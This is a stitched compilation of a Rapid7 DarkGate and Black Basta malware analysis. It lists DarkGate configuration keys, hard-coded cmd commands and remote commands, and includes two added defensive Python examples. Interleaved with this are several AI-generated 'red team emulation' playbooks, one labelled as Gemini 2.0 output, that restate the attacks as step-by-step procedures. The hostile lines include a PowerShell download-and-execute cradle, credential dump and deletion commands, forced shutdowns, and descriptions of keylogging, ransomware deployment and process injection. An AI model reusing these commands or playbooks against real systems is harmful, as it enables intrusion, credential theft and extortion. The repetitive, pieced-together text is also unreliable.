    If enabled and the file C:\ProgramData\hedfdfd\Autoit3.exe does not exist, call MessageBoxTimeoutA using keys 11 and 12 and a timeout of 1770ms.
11=Error
    Used by key 8 as a message box title.
12=PyKtS5Q
    The string Error, base64 encoded with the custom alphabet zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=. Used by key 8 as a message box caption.
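Two analyst tasks follow directly from the passage above: recovering the CRLF-delimited config without the key, since every byte after the first is XORed with the same single byte, and decoding values such as key 12 that use the custom base64 alphabet. The following is an added example for this page, not Rapid7's or DarkGate's code. It tries all 256 single-byte keys over the blob after its first byte and keeps the candidate with the most "name=value" lines; the first byte is produced differently by the sample's loop and is not modelled here. The encrypted blob is constructed from the page's quoted key/value rows, not bytes from SafeFilter.exe, and the function names (recover_config, parse_config, darkgate_b64_decode) are this example's own.

```python
"""Recover the DarkGate configuration and decode its custom-alphabet base64.

Added example, not Rapid7's or DarkGate's code. The blob below is
constructed from the quoted config rows, XORed with 0x60 after a leading
placeholder byte; the sample's real first byte is not modelled.
"""
import base64
import re

# Alphabet as quoted in the analysis: 64 symbols, with '=' as the last one.
DARKGATE_B64_ALPHABET = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+="
STANDARD_B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
CONFIG_LINE = re.compile(r"\w+=[^\r\n]*")   # e.g. 25=drk2 or tabla=...


def darkgate_b64_decode(encoded):
    """Map the custom alphabet onto the standard one, re-pad, and decode.
    Because '=' is a data symbol in the quoted alphabet, padding is recomputed
    from the length rather than read from the input."""
    table = str.maketrans(DARKGATE_B64_ALPHABET, STANDARD_B64_ALPHABET)
    std = encoded.translate(table)
    return base64.b64decode(std + "=" * (-len(std) % 4))


def recover_config(blob):
    """Brute-force the single-byte XOR key over blob[1:]; return (key, text).
    Candidates are scored by how many CRLF-delimited name=value lines they
    yield, which only the correct key produces in quantity."""
    best_key, best_text, best_score = None, None, -1
    for key in range(256):
        candidate = bytes(b ^ key for b in blob[1:])
        try:
            text = candidate.decode("ascii")
        except UnicodeDecodeError:
            continue
        score = sum(1 for line in text.split("\r\n") if CONFIG_LINE.fullmatch(line))
        if score > best_score:
            best_key, best_text, best_score = key, text, score
    return best_key, best_text


def parse_config(text):
    """Split recovered CRLF-delimited options into a dict of name -> value."""
    return dict(line.split("=", 1) for line in text.split("\r\n") if "=" in line)


# Constructed sample: rows quoted from the analysis, encrypted with 0x60 behind
# a placeholder first byte (0x00) that stands in for the differently-handled one.
_PLAIN = "0=179.60.149[.]194|\r\n1=Yes\r\n15=80\r\n12=PyKtS5Q\r\n25=drk2\r\n".encode()
SAMPLE_CONFIG_BLOB = b"\x00" + bytes(b ^ 0x60 for b in _PLAIN)

if __name__ == "__main__":
    key, text = recover_config(SAMPLE_CONFIG_BLOB)
    cfg = parse_config(text)
    print(hex(key), cfg)                      # 0x60 {'0': '179.60.149[.]194|', ...}
    print(darkgate_b64_decode(cfg["12"]))     # b'Error'
```

The scoring works because the CR and LF bytes that separate options only reappear under the correct key; any other key turns the whole blob into a single line and scores at most 1. Decoding key 12 with the quoted alphabet yields Error, matching the description of key 11, which is a useful check that the alphabet was transcribed correctly.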

Phase: Initial Access

  • Technique: Script Execution via VBS
  • Procedure: Execution initiated through test.vbs which triggers further payload actions.

Phase: Execution

  • Technique: Malware Deployment
  • Program: SafeFilter.exe
  • Description: This executable is an instance of the DarkGate malware, packed with a custom packer, and performs several layers of decrypting and loading.

Phase: Defense Evasion

  • Technique: Custom Packer Usage
  • Procedure: Custom-packed to avoid detection, requiring decryption to access the final payload.

Phase: Discovery

  • Technique: Check for Specific Directory
  • Procedure: Checks for the existence of c:\debugg directory to determine execution outcome (displays version number if exists).

Phase: Execution

  • Technique: Display a Message Box
  • Procedure: Uses MessageBoxA to display malware version number if certain conditions are met.

Phase: Execution

  • Technique: Conditional Message Box Display
  • Configuration Key 8: If C:\ProgramData\hedfdfd\Autoit3.exe does not exist, a message box is displayed using a timeout.

Phase: Decryption

  • Technique: XOR Decryption
  • Procedure: Configuration decrypted using key ckcilIcconnh within a custom XOR loop, with keyspace reduced effectively to a single byte (0x60).

Config Extraction Insight:
  • Campaign ID: drk2
  • Conditions for Message Box Display: Based on configuration settings to show error message if certain files are missing.

This structured representation highlights the tactics and procedures used in the execution of the DarkGate malware, which can assist red teams in emulating attack scenarios for testing defensive capabilities.

Key-Value Pair (SafeFilter.exe DarkGate Config) / Description (continued)

13=6
    Unknown
14=Yes
    Unknown
15=80
    C2 communication port.
1=Yes
    Enables infection.
32=Yes
    If enabled, attempt bypass of detected security products. For example, enables calls to RtlAdjustPrivilege and NtRaiseHardError to cause a crash if hdkcgae is not present in C:\temp\ and a Kaspersky product has been detected.
3=No
    If disabled, do an anti-vm display check.
4=No
    If enabled, compare system drive size to key 18. If below, exit.
18=100
    Minimum drive size in GB.
6=No
    If enabled and key 3 is disabled, check the display for known virtual machine display strings using EnumDisplayDevicesA. If matched, exit. Failed to match properly when tested.
7=No
    If enabled, compare system RAM to key 19. If below, exit.
19=4096
    Minimum RAM size in MB.
5=No
    If enabled, check the registry key ProcessorNameString at HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 for xeon. If found, exit.
21=No
    Unknown
22
    Not present in the config for this sample, but is still checked for in the code. If enabled, set the variant string to DLL, otherwise ?.
23=Yes
    If enabled, set the variant string to AU3 for Autoit3 payloads.
31=No
    If enabled, set the variant string to AHK for AutoHotKey payloads.
25=drk2
    Campaign ID
26=No
    Unknown
27=rsFxMyDX
    Decryption key, also used to bound/find payloads stored within other files.
28=No
    Unknown
29=2
    Unknown
35=No
    Unknown
tabla=IsUiPQ4&atzM5N=0($" 3]TGfyK8JYwvO61SAF{ndrDu ol29*RkmqCpgxeX[EH,V)}7j bZBc.WLh
    Unknown

DarkGate Hard-coded Commands
/c cd /d "C:\Users\User\AppData\Roaming" && move

Phase: Execution

  • Technique: Execution of Malicious Configuration File
  • Procedure: The attacker uses SafeFilter.exe with the DarkGate configuration to execute and manipulate system settings for the malware's functionality.

Phase: Defense Evasion

  • Technique: Privilege Escalation and Security Software Evasion
  • Command: Calls RtlAdjustPrivilege and NtRaiseHardError to crash the system if specific conditions are met (e.g., Kaspersky product detection).

  • Technique: Anti-VM Checks
  • Procedure: Uses EnumDisplayDevicesA to check for virtual machine display strings and may exit if virtualized environment characteristics are detected.

  • Technique: System Checks
  • Procedure: Compares system drive size (key 18, 100 GB minimum) and system RAM (key 19, 4096 MB minimum) against the configuration settings, exiting if below thresholds.

  • Technique: Registry Key Inspection
  • Command: Checks HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString for "xeon" string to identify virtual environments.

Phase: Command and Control

  • Technique: C2 Communication
  • Description: Utilizes port 80 for command and control communications.

Phase: File Manipulation

  • Technique: File Renaming
  • Command: /c cd /d "C:\Users\User\AppData\Roaming<browser_dir>" && move <browser_name> <browser_name><random_alphabet_string>
  • Procedure: Moves and renames files within designated directories to obfuscate activity and maintain persistence.

Phase: Payload Variants

  • Technique: Payload Type Determination
  • Procedure: Sets variant strings for different payloads, such as Autoit3 ("AU3") and AutoHotKey ("AHK"), based on configuration settings.

Additional Configuration

  • Campaign ID: Identified as drk2.
  • Decryption Key: Utilized rsFxMyDX to manage and find encrypted payloads within files.

DarkGate Hard-coded Commands (continued)
/c cd /d "C:\Users\User\AppData\Local" && move
/c cmdkey /delete:
/c cmdkey /list > c:\temp\cred.txt
/c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox*
/c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\hedfdfd\ & rmdir /s /q C:\ProgramData\hedfdfd\
/c shutdown -f -r -t 0
/c shutdown -f -s -t 0
/c wmic ComputerSystem get domain > C:\ProgramData\hedfdfd\fcadaab

During execution, DarkGate will hash certain strings and use the result to create or check files at the directories C:\ProgramData\hedfdfd (mainfolder) and C:\temp. The hashing algorithm uses a randomized key generated at runtime, so the hashes across infections will be different. Commonly used strings and their resultant hash, for the analysis environment, are shown below.

Path String    DarkGate Custom Hash
mainfolder     hedfdfd
logsfolder     fhhcfhh
settings       dhkbbfc
domain         fcadaab
mutex0         hfgdced
mutex1         cekchde
au3            dgfeabe
c.txt          adfcbdd
cc.txt         dehgaba
script         daaadeh
fs.txt         hdkcgae

DarkGate may also change its behavior if a known security product is detected. This is achieved by using CreateToolhelp32Snapshot and related functions to loop through running processes, which are compared to a hard-coded list. The malware will also check for known installation directories using GetFileAttributesA. If a security product is found, a flag will be set which may alter the execution path. Only the following products had associated flags:

DarkGate “Supported” Security Products
Windows Defender
Sophos
Quick Heal
MalwareBytes
Panda Security
Norton/Symantec
ESET/Nod32
Kaspersky
Avast
SentinelOne

Phase: Execution

  • Technique: Command Prompt Execution
  • Command 1: /c cd /d "C:\Users\User\AppData\Local" && move <browser_name> <browser_name><random_alphabet_string>
  • Command 2: /c cmdkey /delete:
  • Command 3: /c cmdkey /list > c:\temp\cred.txt

Phase: Defense Evasion

  • Technique: File Deletion
  • Command 1: /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox*
  • Command 2: /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\hedfdfd\ & rmdir /s /q C:\ProgramData\hedfdfd\

Phase: Impact

  • Technique: System Shutdown/Reboot
  • Command 1: /c shutdown -f -r -t 0
  • Command 2: /c shutdown -f -s -t 0

Phase: Discovery

  • Technique: System Information Discovery
  • Command: /c wmic ComputerSystem get domain > C:\ProgramData\hedfdfd\fcadaab

Additional Techniques

  • Technique: Hashing for Obfuscation and File Creation
  • Detail: DarkGate hashes strings with a randomized key at runtime to create or check files in specified directories.

  • Technique: Process Discovery and Evasion
  • Detail: Uses CreateToolhelp32Snapshot to loop through processes and GetFileAttributesA to check for security products, setting a flag to alter execution if detected.

These procedures outline how DarkGate carries out its operations, focusing on command execution, defense evasion, system manipulation, and dynamic behavior based on environment analysis.

DarkGate “Supported” Security Products

[Table of security products checked by DarkGate; only the entry "Bitdefender" survived extraction]

At the end of the first execution of the DarkGate payload, it will then attempt to inject itself into a host process. First, DarkGate selects the injection target by searching a list of hard-coded directories, subdirectories included, for any executable whose name contains the string updatecore.exe. The path C:\Program Files (x86)\Microsoft\EdgeUpdate\ is searched first, with C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe as the fallback. If a matching Edge executable is not found, the path C:\Program Files (x86)\Google\Update\ is searched next. If that also fails, the malware will attempt to use C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe. After successfully choosing the injection target, DarkGate injects itself into the target process using shellcode and terminates the original instance of the final DarkGate payload once the shellcode has executed. When creating an instance of the target process to inject into, DarkGate also attempts to spoof the parent process ID (PPID) of the injection target: it enumerates running processes, tests each for accessibility using OpenProcess, and then randomly selects one from the assembled list. The PPID of the target is then set using UpdateProcThreadAttribute prior to creation with CreateProcessA.

Execution of the injected process is coordinated by checking for the presence of two file-based mutexes within C:\ProgramData\hedfdfd\ (mainfolder). Each instance of the DarkGate malware checks both file-based mutexes. Mutex usage is checked via calls to CreateFileA with an exclusive share mode (0) and a creation disposition of CREATE_ALWAYS, which means that if the mutex is already in use by another DarkGate instance the call will fail. If the calls to both mutexes created by DarkGate, hfgdced and cekchde, fail, DarkGate will exit. As a result of having two mutexes, DarkGate will typically run within two injected process instances at the same time, so if one process is terminated, the remaining instance will spawn another. If a DarkGate instance is spawned and both calls to open the file-based mutexes fail, indicating two existing DarkGate instances, the new instance will terminate. This technique is rarely used by malware developers and highlights the sophistication of the DarkGate malware.

DarkGate will unconditionally log keystrokes as well as clipboard data that is under 1024 bytes. The logged data is stored encrypted at C:\ProgramData\hedfdfd\fhhcfhh (mainfolder\logsfolder) within files named .log. The logged data may also be sent directly to the C2 address contained within the config.

A thread is also created to persist on infected systems by creating the Run key daaadeh (script) at HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The Run key points to the copies of Autoit3.exe and the compiled AU3 script payload dgfeabe.a3x (au3) created at C:\ProgramData\hedfdfd (mainfolder), with the former executing the latter every time the user logs on. When the AU3 script is executed, DarkGate reinfects the system. The same thread also continuously monitors the text within the infected user’s active window, sleeping 1500ms between checks, and will delete the registry key if a blacklisted application is detected. This list includes popular analysis tools such as Process Hacker, Process Monitor, Task Manager, and even the Windows Registry Editor.

The DarkGate sample executed by SafeFilter.exe contains 78 remote commands, some of which can be seen below with their intended function. Every loop, the malware re-sends the text of the active window, the user idle time, and whether or not the malware instance has admin rights, before checking for a command.
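As an added example (not part of the Rapid7 report or its detection rules), the following Python script turns the persistence details above into a check over Sysmon-style registry value-set records: it flags Run values that launch Autoit3.exe or an .a3x script, that point under C:\ProgramData\, or that were written by a process located where DarkGate searches for its injection host. The event records, the SID, the user name and the benign entries are constructed; treating a Run value written from the EdgeUpdate, Google Update or msbuild.exe locations as suspicious is this example's inference from the report's injection-target list, not a statement the report makes.

```python
import re
from dataclasses import dataclass, field

# Run-key value paths as Sysmon renders them (HKU\<SID>\... or HKLM\...).
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$", re.IGNORECASE
)

# Where DarkGate looks for its injection host (EdgeUpdate, Google Update, then the
# msbuild.exe fallback). Inference made for this example, not stated in the report:
# an autostart value written by a process from one of these locations is unusual,
# because updaters and build tools do not normally register Run keys.
INJECTION_HOST_PREFIXES = (
    "c:\\program files (x86)\\microsoft\\edgeupdate\\",
    "c:\\program files (x86)\\google\\update\\",
    "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\msbuild.exe",
)


@dataclass
class Finding:
    value_name: str
    value_data: str
    writer_image: str
    reasons: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)  # one point per matched indicator


def assess_run_value(value_data: str, writer_image: str) -> list:
    """Return the indicators matched by one Run-key value and the process that set it."""
    data, image, reasons = value_data.lower(), writer_image.lower(), []
    # Autoit3.exe executing a compiled .a3x script is the persistence shape the
    # report describes (Run key daaadeh -> Autoit3.exe dgfeabe.a3x).
    if "autoit3.exe" in data or ".a3x" in data:
        reasons.append("autoit_interpreter_and_script")
    # The staging folder name (hedfdfd in the sample) is random, so match the
    # location, not the name. Weak on its own: some legitimate agents live there too.
    if "c:\\programdata\\" in data:
        reasons.append("payload_under_programdata")
    if image.startswith(INJECTION_HOST_PREFIXES):
        reasons.append("written_by_darkgate_injection_host")
    return reasons


def analyze(events) -> list:
    """Walk Sysmon-style records; return one Finding per Run value with indicators."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:  # 13 = RegistryEvent (value set)
            continue
        match = RUN_KEY_RE.search(ev.get("TargetObject", ""))
        if not match:
            continue
        reasons = assess_run_value(ev.get("Details", ""), ev.get("Image", ""))
        if reasons:
            findings.append(Finding(match.group(1), ev["Details"], ev["Image"], reasons))
    return findings


# Constructed sample records in the shape of Sysmon Event ID 13; the SID, the user
# name and the benign entries are made up for this example.
SID = "S-1-5-21-1111-2222-3333-1001"
RUN = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
SAMPLE_EVENTS = [
    {   # DarkGate-style persistence, written from the injected EdgeUpdate host
        "EventID": 13,
        "TargetObject": "HKU\\" + SID + RUN + "daaadeh",
        "Details": "C:\\ProgramData\\hedfdfd\\Autoit3.exe C:\\ProgramData\\hedfdfd\\dgfeabe.a3x",
        "Image": "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe",
    },
    {   # benign: OneDrive registering itself
        "EventID": 13,
        "TargetObject": "HKU\\" + SID + RUN + "OneDrive",
        "Details": "\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background",
        "Image": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe",
    },
    {   # weak signal only: an installer registering an agent that lives in ProgramData
        "EventID": 13,
        "TargetObject": "HKLM" + RUN + "VendorAgent",
        "Details": "C:\\ProgramData\\ExampleVendor\\agent.exe --tray",
        "Image": "C:\\Users\\alice\\Downloads\\vendor-setup.exe",
    },
    {"EventID": 1, "Image": "C:\\ProgramData\\hedfdfd\\Autoit3.exe"},  # not a registry event
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[score {f.score}] Run\\{f.value_name} = {f.value_data}")
        print(f"    set by {f.writer_image}; indicators: {', '.join(f.reasons)}")
```

A score of 3 means all three traits lined up; a lone payload_under_programdata hit is a triage hint rather than an alert on its own.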

Phase: Execution

  • Technique: Process Injection
  • Procedure: DarkGate malware searches for executables in specified directories to inject itself. It prioritizes:
    • C:\Program Files (x86)\Microsoft\EdgeUpdate\
    • C:\Program Files (x86)\Google\Update\
    • Fallback: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
  • Technique: Process Hollowing with Shellcode
  • Procedure: Injects shellcode into a target process, using OpenProcess and CreateProcessA to spoof the Parent Process ID (PPID).

Phase: Persistence

  • Technique: Registry Run Key Modification
  • Command: Creates a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run to persist via Autoit3.exe and dgfeabe.a3x.

Phase: Defense Evasion

  • Technique: Mutex Usage for Multi-Instance Control
  • Procedure: Uses mutexes hfgdced and cekchde within C:\ProgramData\hedfdfd\ to prevent multiple instances.
  • Technique: Parent Process ID Spoofing
  • Procedure: Spoofs PPID using UpdateProcThreadAttribute.

Phase: Credential Access

  • Technique: Keylogging
  • Procedure: Logs keystrokes and clipboard data under 1024 bytes, storing it encrypted at C:\ProgramData\hedfdfd\fhhcfhh.

Phase: Command and Control

  • Technique: Remote Commands Execution
  • Procedure: Cycles through 78 remote commands, logging active window text, user idle time, and admin status.

Phase: Detection Avoidance

  • Technique: Environment Check for Analysis Tools
  • Procedure: Continuously monitors running applications, deleting the Run key if blacklisted tools are detected, including Process Hacker and Task Manager.

These structured procedures provide a detailed framework for red teams to emulate the DarkGate attack techniques effectively.

Command ID and Function

  • 1000: Sleep for a randomized amount of time.
  • 1004: Use MessageBoxA to display the message test msg.
  • 1044, 1045, 1046: Click the user’s mouse at specified screen coordinates using SetCursorPos and successive calls to mouse_event. 1044 for double left-click, 1045 for single left-click, 1046 for single right-click.
  • 1049: Create a remote shell via powershell.exe.
  • 1059: Terminate process by PID.
  • 1061: Inject DarkGate shellcode into a specified process, or an Edge/Chrome process if none is selected. The shellcode is then executed via ResumeThread.
  • 1062, 1063, 1064: Inject DarkGate shellcode into a specified process, or cmd.exe if none is selected. The shellcode is then executed via CreateRemoteThread.
  • 1066: Remove infection files by using cmd.exe to delete the staging directories C:\ProgramData\hedfdfd and c:\temp.
  • 1071: Steal sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present.
  • 1079: If admin, delete stored credentials found using cmdkey.
  • 1080: Rename browser directories for Firefox, Chrome, and Brave if present, after terminating the related browser executable. Attempt to steal Opera cookies if present, after terminating the process.
  • 1081: Use the NTAPI calls RtlAdjustPrivilege and NtRaiseHardError to crash the system.
  • 1083: Use the shutdown command to turn the system off.
  • 1084: Use the shutdown command to restart the system.
  • 1089: If 1=Yes in config, reinfect the system with AU3 payloads.
  • 1093: Create a remote shell via cmd.exe.
  • 1097: Infect the system with the AU3 variant. Creates the files script.a3x and Autoit3.exe in c:\temp and then executes script.a3x via Autoit3.exe using CreateProcessA.
  • 1104: Infect the system with the AHK variant. Creates the files script.ahk, test.txt, and AutoHotkey.exe in c:\temp and then executes script.ahk via AutoHotkey.exe using CreateProcessA.
  • 1108: Infect the system with the DLL variant. Creates the files libcurl.dll, test.txt, and GUP.exe in c:\temp and then executes GUP.exe via CreateProcessA.
  • 1111: Create the files ransom.txt and decrypter.exe in c:\temp. Terminate decrypter.exe if already running and then execute decrypter.exe using CreateProcessA. Likely ransomware deployment method.

DarkGate Remote Command Related Strings


U_Binder U_BotUpdate U_Constantes U_FTPRecovery U_FileManager U_FileManagerMisc U_GetScreens U_HVNC U_HVNC_7 U_HWID U_InfoRecovery U_InjectOnFly U_Keylogger U_LNKStartup U_MemExecute U_MemExecuteMisc U_RemoteScreen U_SysApi U_SysNtReadWrite

Phase: Execution

  • Technique: Remote Shell via PowerShell
  • Command: powershell.exe -Command Start-Process PowerShell -ArgumentList 'iex (New-Object Net.WebClient).DownloadString(''[url]'')'
  • Technique: Remote Shell via CMD
  • Command: cmd.exe /c [shell commands]

Phase: Privilege Escalation

  • Technique: Injecting Shellcode
  • Command: Use ResumeThread or CreateRemoteThread to execute injected DarkGate shellcode in specified processes.

Phase: Defense Evasion

  • Technique: Credential Removal
  • Command: cmdkey /list | findstr /v "Web Credential Manager" | findstr /v "Ok" | findstr /v "Generic Credentials" | findstr /v "Vault" | findstr ":" | for /f "tokens=1,2 delims=:" %i in ('more') do cmdkey /del:%i
  • Technique: File Deletion
  • Command: cmd.exe /c del /q /s c:\ProgramData\hedfdfd\*
  • Command: cmd.exe /c del /q /s c:\temp\*

Phase: Credential Access

  • Technique: Harvesting Credentials from FileZilla
  • Procedure: Steal sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present.

Phase: Persistence

  • Technique: System Re-infection
  • Procedure: Reinfect the system with AU3 payloads if configured to do so.

Phase: Impact

  • Technique: System Shutdown
  • Command: shutdown /s /t 0
  • Technique: System Restart
  • Command: shutdown /r /t 0
  • Technique: Ransomware Deployment
  • Procedure: Create ransom.txt and decrypter.exe in c:\temp, terminate any existing decrypter.exe process, and execute decrypter.exe using CreateProcessA.

DarkGate Remote Command Related Strings


U_miniclipboard u_AntiAntiStartup u_Antis u_AudioRecord u_CustomBase64 u_ExtraMisc u_HollowInstall u_InjectEP u_InvokeBSOD u_RDPRecovery u_Ransomware u_ReadCookies u_ReverseShell u_RootkitMutex u_Settings u_SettingsPad u_ShellcodeEP u_UnlockCookies u_loadpe hxxps://ipinfo[.]io/ip

Mitigation Guidance

Rapid7 recommends taking the following precautions to limit exposure to these types of attacks:

  • Restrict the ability of external users to contact users via Microsoft Teams to the greatest extent possible. This can be done, for example, by blocking all external domains or by creating a whitelist or blacklist. Microsoft Teams allows all external requests by default. For more information, see this reference.
  • Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution.
  • Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures so that they can spot and report suspicious requests.
  • Standardize VPN access. Traffic from known low-cost VPN solutions should be blocked at the firewall level if there is no business use case.

Rapid7 Customers

InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage.

Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity:

Detections

  • Suspicious Chat Request - Potential Social Engineering Attempt
  • Initial Access - Potential Social Engineering Session Initiated Following Chat Request
  • Suspicious Conversation - Potential Social Engineering Message Interaction
  • Attacker Technique - Process Executed Using Nt Object Path
  • Suspicious Process - Enumeration Burst via ShellExecute
  • Attacker Technique - Renamed Kaspersky Dump Writer

Phase: Execution

  • Technique: Shellcode Execution
  • Related Strings and Mechanisms: u_ShellcodeEP

Phase: Persistence

  • Technique: Process Injection with Installer
  • Related Strings and Mechanisms: u_HollowInstall

Phase: Credential Access

  • Technique: Read Cookies
  • Related Strings and Mechanisms: u_ReadCookies

Phase: Lateral Movement

  • Technique: Reverse Shell
  • Related Strings and Mechanisms: u_ReverseShell

Phase: Impact

  • Technique: Invoke BSOD
  • Related Strings and Mechanisms: u_InvokeBSOD

Additional Components

  • Technique: Remote Desktop Protocol Recovery
  • Related Strings and Mechanisms: u_RDPRecovery
  • Technique: Anti-Analysis/Anti-Debugging
  • Related Strings and Mechanisms: u_AntiAntiStartup, u_Antis
  • Technique: Rootkit/Mutex
  • Related Strings and Mechanisms: u_RootkitMutex
  • Technique: Customized Encoding/Decoding
  • Related Strings and Mechanisms: u_CustomBase64
  • Technique: Audio Recording
  • Related Strings and Mechanisms: u_AudioRecord

These structured techniques and related procedures provide a representation of the threat actor's tactics, enabling a red team to simulate the described attack scenario.

Detections

  • Ransomware - Possible Black Basta Related Binary Execution
  • Credential Access - Steal or Forge Kerberos tickets
  • Suspicious Process - Diskshadow (Windows Server) Delete Shadow Copies
  • Non-Approved Application - Remote Management and Monitoring (RMM) Tools

MITRE ATT&CK Techniques

Each entry lists Tactic: Technique. Procedure.

  • Resource Development: T1587.001 Develop Capabilities: Malware. The threat actor is actively developing new malware to distribute.
  • Impact: T1498 Network Denial of Service. The threat actor overwhelms email protection solutions with spam.
  • Initial Access: T1566.004 Phishing: Spearphishing Voice. The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access.
  • Defense Evasion: T1140 Deobfuscate/Decode Files or Information. The threat actor encrypts some zip archive payloads with a password.
  • Defense Evasion: T1055.002 Process Injection: Portable Executable Injection. Multiple payloads executed by the threat actor utilize local PE injection.
  • Defense Evasion: T1620 Reflective Code Loading. Multiple payloads executed by the threat actor load and execute shellcode.
  • Credential Access: T1649 Steal or Forge Authentication Certificates. The threat actor has distributed numerous signed malware payloads.
  • Credential Access: T1056.001 Input Capture: Keylogging. The threat actor runs an executable that harvests the user’s credentials.
  • Credential Access: T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting. The threat actor has performed Kerberoasting after gaining initial access.
  • Discovery: T1033 System Owner/User Discovery. The threat actor enumerates asset and user information within the environment after gaining access.
  • Command and Control: T1572 Protocol Tunneling. The threat actor has attempted to use SSH reverse tunnels.
  • Command and Control: T1219 Remote Access Software. The threat actor has used QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level, and more, to facilitate remote access.

Indicators of Compromise

Indicators of compromise are available here.

Phase: Resource Development

  • Technique: Develop Capabilities: Malware
  • Procedure: The threat actor actively develops new malware for distribution.

Phase: Initial Access

  • Technique: Phishing: Spearphishing Voice
  • Procedure: The threat actor calls impacted users, impersonating IT personnel to gain remote access.

Phase: Execution

  • Technique: Portable Executable Injection
  • Procedure: Multiple payloads executed via local PE injection.

Phase: Defense Evasion

  • Technique: Deobfuscate/Decode Files or Information
  • Procedure: Encrypt zip archive payloads with a password.
  • Technique: Reflective Code Loading
  • Procedure: Load and execute shellcode using reflective code loading.

Phase: Credential Access

  • Technique: Steal or Forge Kerberos Tickets: Kerberoasting
  • Procedure: Perform Kerberoasting after gaining initial access.
  • Technique: Steal or Forge Authentication Certificates
  • Procedure: Distribute signed malware payloads.
  • Technique: Input Capture: Keylogging
  • Procedure: Execute programs for keylogging to capture user credentials.

Phase: Discovery

  • Technique: System Owner/User Discovery
  • Procedure: Enumerate asset and user information post-access.

Phase: Impact

  • Technique: Network Denial of Service
  • Procedure: Overwhelm email protection solutions with spam.

Phase: Command and Control

  • Technique: Protocol Tunneling
  • Procedure: Use SSH reverse tunnels for communication.
  • Technique: Remote Access Software
  • Procedure: Utilize QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level for remote access.

Additional Techniques

  • Technique: Diskshadow for Shadow Copies Deletion
  • Command: Likely involves using Diskshadow commands to delete shadow copies.
  • Technique: Non-Approved RMM Tools
  • Procedure: Use Remote Management and Monitoring tools for persistence and control.

Gemini 2.0

Model: gemini-2.0-flash

Okay, here's the breakdown of the procedures used by the Black Basta ransomware operators, formatted for red team emulation, based on the provided CTI report:

Phase: Initial Access

  • Technique: Social Engineering via Microsoft Teams/Email Bombing
  • Procedure:
    1. Email bomb the target user, signing them up to numerous mailing lists simultaneously.
    2. Contact the user via Microsoft Teams pretending to be IT support offering assistance. Impersonate IT staff.

Phase: Execution

  • Technique: Remote Management Tool Installation
  • Procedure: Trick the user into installing or executing a remote management tool such as:
    • QuickAssist
    • AnyDesk
    • TeamViewer
    • Level
    • ScreenConnect
    • Use OpenSSH client to establish a reverse shell
  • Technique: QR Code Phishing
  • Procedure: Send the user a QR code leading to a URL to bypass MFA.

Phase: Credential Harvesting

  • Technique: Custom Credential Harvester Execution
  • Procedure:
    1. Execute the custom credential harvesting DLL using rundll32.
    2. Example Command: rundll32.exe SafeStore.dll,epaas_request_clone
    3. The DLL will execute the following commands to gather system information:
      • systeminfo
      • route print
      • ipconfig /all
    4. The DLL will prompt the user to enter their password into a GUI.
  • Technique: Java Credential Harvester Execution
  • Procedure: Execute Java based credential harvester.

Phase: Payload Delivery and Execution

  • Technique: Loader Execution (Zbot/DarkGate)
    • Procedure: Following credential harvesting, execute Zbot (Zloader) or DarkGate.
  • Technique: Command Execution via Teams
    • Procedure: Send a short command via Teams that, when executed, begins an infection chain.
  • Technique: Payload delivery with custom packer
    • Procedure: Deliver obfuscated versions of Black Basta ransomware through a custom packer.
  • Technique: In-Memory Payload Execution
    • Procedure: Subsequent payloads are executed in memory.

Phase: Persistence

  • Technique: Scheduled Task Creation (Zbot)
    • Procedure: Create scheduled tasks named after the executable to execute the malware upon logon.
  • Technique: Registry Run Key Creation (Zbot)
    • Procedure: Create a Run key to execute the malware upon logon.
  • Technique: Run key with AU3 script
    • Procedure: Create a Run key pointing to Autoit3.exe and the compiled Autoit3 script.

Phase: Defense Evasion

  • Technique: Process Hollowing (Zbot)
    • Procedure: Inject Zbot into a suspended instance of msedge.exe, created using NtCreateUserProcess and executed via ResumeThread.
  • Technique: Anti-Hooking (Zbot)
    • Procedure: Load a fresh copy of ntdll.dll to avoid hooking, which is then used to perform calls to NTAPI functions.
  • Technique: Check for Security Products (DarkGate)
    • Procedure: Checks for running processes and installation directories associated with specific security products.

